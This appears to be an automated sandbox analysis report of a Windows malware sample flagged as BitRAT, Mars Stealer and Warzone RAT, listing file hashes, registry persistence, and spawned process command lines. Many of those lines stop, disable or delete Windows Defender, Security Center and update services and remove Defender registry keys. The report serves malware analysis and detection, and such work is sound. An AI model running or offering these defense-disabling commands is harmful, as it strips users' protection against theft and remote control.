C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\MsiProvider.dll
| MD5 | 45ff4fa5ca5432bfccded4433fe2a85b |
| SHA1 | 858c42499dd9d2198a6489dd310dc5cbff1e8d6e |
| SHA256 | 8a85869b2d61bad50d816daf08df080f8039dbeb1208009a73daa7be83d032bd |
| SHA512 | abbe0f673d18cc9a922cfd677e5b88714a3049ad8937f836b5a8b9bddac5ddbad4dc143360efc018dcd3a3440aa3e516b1a97f7cd2fa9a55cb73739dedef1589 |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\en-US\LogProvider.dll.mui
| MD5 | f909216cf932aeb4f2f9f02e8c56a815 |
| SHA1 | c5cafe5f8dad60d3a1d7c75aa2cf575e35a634f2 |
| SHA256 | f5c89ba078697cdb705383684af49e07cdd094db962f0649cad23008ae9d6ce2 |
| SHA512 | 5dca19d54f738486085f11b5a2522073894a97d67e67be0eadbe9dc8944e632ae39b24499d7ff16e88d18166031697a238ead877f12cbb7447acca49c32a184a |
\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\IntlProvider.dll
| MD5 | bbb9e4fa2561f6a6e5ccf25da069ac1b |
| SHA1 | 2d353ec70c7a13ac5749d2205ac732213505082a |
| SHA256 | b92cf901027901d7066e9ee7ac8f3b48a99cfb3a3ddd8d759cb77295148943c1 |
| SHA512 | 01f4e6d51a0acb394693191b78cefa28759903036636a1d64f90c60dc59c948c78dd38df6fb2be149245622eadf8b2627c6767bf2aa2e0e56e6b52f0b91cc79e |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\en-US\IntlProvider.dll.mui
| MD5 | 0bffb5e4345198dbf18aa0bc8f0d6da1 |
| SHA1 | e2789081b7cf150b63bad62bac03b252283e9fe5 |
| SHA256 | b7bcc0e99719f24c30e12269e33a8bf09978c55593900d51d5f8588e51730739 |
| SHA512 | 590e8016075871846efff8b539e4779a1a628de318c161292c7231ca964a310e0722e44816041786c8620bff5c29ff34c5f35733ee4eac74f3abfae6d3af854a |
\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\IntlProvider.dll
| MD5 | bbb9e4fa2561f6a6e5ccf25da069ac1b |
| SHA1 | 2d353ec70c7a13ac5749d2205ac732213505082a |
| SHA256 | b92cf901027901d7066e9ee7ac8f3b48a99cfb3a3ddd8d759cb77295148943c1 |
| SHA512 | 01f4e6d51a0acb394693191b78cefa28759903036636a1d64f90c60dc59c948c78dd38df6fb2be149245622eadf8b2627c6767bf2aa2e0e56e6b52f0b91cc79e |
\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\FolderProvider.dll
| MD5 | c9d74156913061be6c51d8fc3acf8e93 |
| SHA1 | 4a4c6473a478256e4c78b423e918191118e01093 |
| SHA256 | af0a38b4e95a50427b215eebc185bb621187e066b8b7373fb960eac0551bec37 |
| SHA512 | c12f75a6451881878a7a9ed5de61d157ea36f53aa41abf7660e1cc411b2ddd70ff048a307b1440cfdf1b269aeff77da8cc163ad19e9e3a294a5128f170f37047 |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\en-US\FolderProvider.dll.mui
| MD5 | cab37f952682118bac4a3f824c80b6ac |
| SHA1 | 6e35b4289927e26e3c50c16cbf87eb3ac6f3b793 |
| SHA256 | 14bec7c4bb6cf1ee9049ef8820ec88bf78f2af75615f7a3fb265ef4b45c30e4d |
| SHA512 | de9089adaa85f37201526b8619f697be98a7d05353b21b6d835f4d56803732380316359ba8b3c8ca7c14a9bf7cf31a7eff3c866a8f303ef737eb63573e01aa19 |
\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\FolderProvider.dll
| MD5 | c9d74156913061be6c51d8fc3acf8e93 |
| SHA1 | 4a4c6473a478256e4c78b423e918191118e01093 |
| SHA256 | af0a38b4e95a50427b215eebc185bb621187e066b8b7373fb960eac0551bec37 |
| SHA512 | c12f75a6451881878a7a9ed5de61d157ea36f53aa41abf7660e1cc411b2ddd70ff048a307b1440cfdf1b269aeff77da8cc163ad19e9e3a294a5128f170f37047 |
\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\DmiProvider.dll
| MD5 | fc2db5842190c6e78a40cd7da483b27c |
| SHA1 | e94ee17cd06fb55d04bef2bdfcf5736f336e0fa0 |
| SHA256 | e6c93305d886bff678bd83b715bb5c5cbb376b90b973d9dd6844fac808de5c82 |
| SHA512 | d5d32b894a485447d55499a2f1e02a8b33fb74081f225b8e2872995491a37353cf8022f46feeb3ca363b2e172ab89e29ab9a453692d1a964ca08d40230574bf6 |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\en-US\DmiProvider.dll.mui
| MD5 | ee8c06cd11b34a37579d118ac5d6fa1d |
| SHA1 | c62f7fb0c6f42321b33ea675c0dfd304b2eb4a15 |
| SHA256 | 6991fb4bfd6800385a32ac759dd21016421cb13dca81f04ddcaf6bf12a928ccc |
| SHA512 | 091cfa7d9b80e92df13ba829372dfb211214f4221e52fbf3f558ebb7f18736ad9ad867ea0d0ddf8938def1b4db64a12d0df37c2eaf41727b997f4905dd41fed1 |
\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\DmiProvider.dll
| MD5 | fc2db5842190c6e78a40cd7da483b27c |
| SHA1 | e94ee17cd06fb55d04bef2bdfcf5736f336e0fa0 |
| SHA256 | e6c93305d886bff678bd83b715bb5c5cbb376b90b973d9dd6844fac808de5c82 |
| SHA512 | d5d32b894a485447d55499a2f1e02a8b33fb74081f225b8e2872995491a37353cf8022f46feeb3ca363b2e172ab89e29ab9a453692d1a964ca08d40230574bf6 |
\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\DismCore.dll
| MD5 | f2b0771a7cd27f20689e0ab787b7eb7c |
| SHA1 | eb56e313cd23cb77524ef0db1309aebb0b36f7ef |
| SHA256 | 7c675710ae52d5e8344465f1179ec4e03c882d5e5b16fc0ba9564b1ea121638f |
| SHA512 | 5ebd4685e5b949d37c52bb1f2fe92accfa48dd4ef585c898f3982eb52f618064fc95c2f98532ca3e7007d0ef71c1fe91887ce3dc0a563f09bc2c5f59f3a3082a |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\en-US\DismCore.dll.mui
| MD5 | f18044dec5b59c82c7f71ecffe2e89ab |
| SHA1 | 731d44676a8f5b3b7ad1d402dfdbb7f08bdc40c6 |
| SHA256 | a650578a4630e1a49280dc273d1d0bbdca81664a2199e5ab44ec7c5c54c0a35e |
| SHA512 | 53c23acddab099508b1e01dcc0d5dc9d4da67bc1765087f4a46b9ac842de065a55bac4c6682da07f5a1d29a3d0c1d92a4310e6b0f838740d919f8285911fa714 |
\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\DismCore.dll
| MD5 | f2b0771a7cd27f20689e0ab787b7eb7c |
| SHA1 | eb56e313cd23cb77524ef0db1309aebb0b36f7ef |
| SHA256 | 7c675710ae52d5e8344465f1179ec4e03c882d5e5b16fc0ba9564b1ea121638f |
| SHA512 | 5ebd4685e5b949d37c52bb1f2fe92accfa48dd4ef585c898f3982eb52f618064fc95c2f98532ca3e7007d0ef71c1fe91887ce3dc0a563f09bc2c5f59f3a3082a |
memory/1436-190-0x00000000001A0000-0x00000000001A1000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2023-01-03 19:42
Reported
2023-01-03 19:47
Platform
win10v2004-20221111-en
Max time kernel
151s
Max time network
155s
Command Line
Signatures
BitRAT
Mars Stealer
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security | C:\Windows\system32\reg.exe | N/A |
WarzoneRat, AveMaria
Warzone RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation | C:\Program Files\InstallerX64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation | C:\PROGRA~1\INSTAL~2.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation | C:\Program Files\installerX32.exe | N/A |
Loads dropped DLL
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program Files\\Microsoft.exe" | C:\Program Files\Microsoft.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost" | C:\Program Files\Microsoft office.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost\ue000" | C:\Program Files\Microsoft office.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost瘀" | C:\Program Files\Microsoft office.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost됀" | C:\Program Files\Microsoft office.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\Microsoft.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File created | C:\Program Files\Builded.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\shellext.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\installerX32.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\__tmp_rar_sfx_access_check_240547968 | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\shellext.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\installerX32.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\shellext.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\InstallerX64.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft office.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\InstallerX64.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\Microsoft office.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\B1079C10-7F64-4C74-8FBC-D4B3E7AFDF3A\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\A8869433-AABD-4A6B-9057-28080F600D5F\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\CB619811-B681-407B-8F85-7CB48683D048\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\E90A543E-89ED-4D12-B4B5-46AE93ECA01F\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\1114080B-0ACB-4CBF-A5F0-6926D5353D27\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\D5BCAA8F-95AB-4136-93CA-BF3BD734ABD1\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\95411DA1-83B1-40E8-8D4E-9E8B9CBE46A6\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
Launches sc.exe
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\System32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Microsoft office.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\Dism.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\installerX32.exe | N/A |
| N/A | N/A | C:\Program Files\InstallerX64.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe
"C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe"
C:\Program Files\Microsoft.exe
"C:\Program Files\Microsoft.exe"
C:\Program Files\Builded.exe
"C:\Program Files\Builded.exe"
C:\Program Files\installerX32.exe
"C:\Program Files\installerX32.exe"
C:\Program Files\InstallerX64.exe
"C:\Program Files\InstallerX64.exe"
C:\Program Files\Microsoft office.exe
"C:\Program Files\Microsoft office.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8524.tmp\8533.tmp\8534.bat "C:\Program Files\installerX32.exe""
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8523.tmp\8524.tmp\8534.bat "C:\Program Files\InstallerX64.exe""
C:\Windows\SysWOW64\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
C:\Windows\system32\sc.exe
sc stop windefend
C:\Windows\system32\sc.exe
sc config windefend start= disabled
C:\Windows\system32\sc.exe
sc delete windefend
C:\Windows\system32\sc.exe
sc stop WdNisSvc
C:\Windows\system32\sc.exe
sc config WdNisSvc start= disabled
C:\Windows\system32\sc.exe
sc delete WdNisSvc
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getadmin.vbs"
C:\Windows\system32\sc.exe
sc stop Sense
C:\Windows\system32\sc.exe
sc config Sense start= disabled
C:\Windows\system32\sc.exe
sc delete Sense
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
C:\PROGRA~1\INSTAL~2.EXE
"C:\PROGRA~1\INSTAL~2.EXE"
C:\Windows\system32\sc.exe
sc stop usosvc
C:\Windows\system32\sc.exe
sc config usosvc start= disabled
C:\Windows\system32\sc.exe
sc stop WaasMedicSvc
C:\Windows\system32\sc.exe
sc config WaasMedicSvc start= disabled
C:\Windows\system32\sc.exe
sc stop SecurityHealthService
C:\Windows\system32\sc.exe
sc config SecurityHealthService start= disabled
C:\Windows\system32\sc.exe
sc delete SecurityHealthService
C:\Windows\system32\sc.exe
sc stop SDRSVC
C:\Windows\system32\sc.exe
sc config SDRSVC start= disabled
C:\Windows\system32\sc.exe
sc stop wscsvc
C:\Windows\system32\sc.exe
sc config wscsvc start= disabled
C:\Windows\system32\sc.exe
sc stop WdiServiceHost
C:\Windows\system32\sc.exe
sc config WdiServiceHost start= disabled
C:\Windows\system32\sc.exe
sc stop WdiSystemHost
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\89D6.tmp\89D7.tmp\89D8.bat C:\PROGRA~1\INSTAL~2.EXE"
C:\Windows\system32\sc.exe
sc config WdiSystemHost start= disabled
C:\Windows\system32\sc.exe
sc stop InstallService
C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
C:\Windows\system32\sc.exe
sc config InstallService Start= disabled
C:\Windows\system32\reg.exe
reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
C:\Windows\system32\sc.exe
sc stop VaultSvc
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI_10.0.19041.1165_neutral_neutral_cw5n1h2txyewy" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\sc.exe
sc config VaultSvc start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\system32\sc.exe
sc stop Spooler
C:\Windows\system32\reg.exe
reg delete "HKEY_CLASSES_ROOT\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc config Spooler start= disabled
